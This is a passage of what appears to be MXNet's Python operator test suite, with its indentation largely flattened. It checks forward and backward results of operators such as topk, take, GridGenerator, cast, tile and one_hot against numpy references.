mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
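        # Bind a constant-initializer symbol and compare its output against the matching numpy constructor.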
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
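        # Numpy ground truth for sort/topk/argsort/argmax/argmin in the 'indices', 'value' and 'mask' return modes.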
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
                for i in range(5):
                    for j in range(5):
                        for m in range(5):  # avoid shadowing the k argument
                            ret[i, gt_argsort[i, :, j, m], j, m] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
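        # Accumulate 1.0 into the slice of grad_in selected by idx along the given axis.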
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
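                # push every index strictly outside the valid range so 'raise' mode must fail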
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
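        # output shape = data_shape[:axis] + idx_shape + data_shape[axis+1:]; use an all-ones output gradient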
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
            except MXNetError:
                return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
                i = np.clip(i, 0, data_shape[axis] - 1)
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
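        # For 'affine', the grid is the 2x3 affine matrix applied to normalized homogeneous
        # target coordinates (x, y, 1) in [-1, 1], so d(loss)/d(affine) = out_grad . coords^T.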
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
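        # The warp grid normalizes (pixel coordinate + flow) by (size - 1) / 2, so the flow
        # gradient is the output gradient scaled by the reciprocal of that factor.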
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
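    # Forward casts srctype -> dsttype; backward casts the incoming gradient back to srctype,
    # so the expected input gradient is X.astype(dsttype).astype(srctype).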
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
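    # amp_multicast is expected to cast all inputs to the widest dtype among them (float32 here).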
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
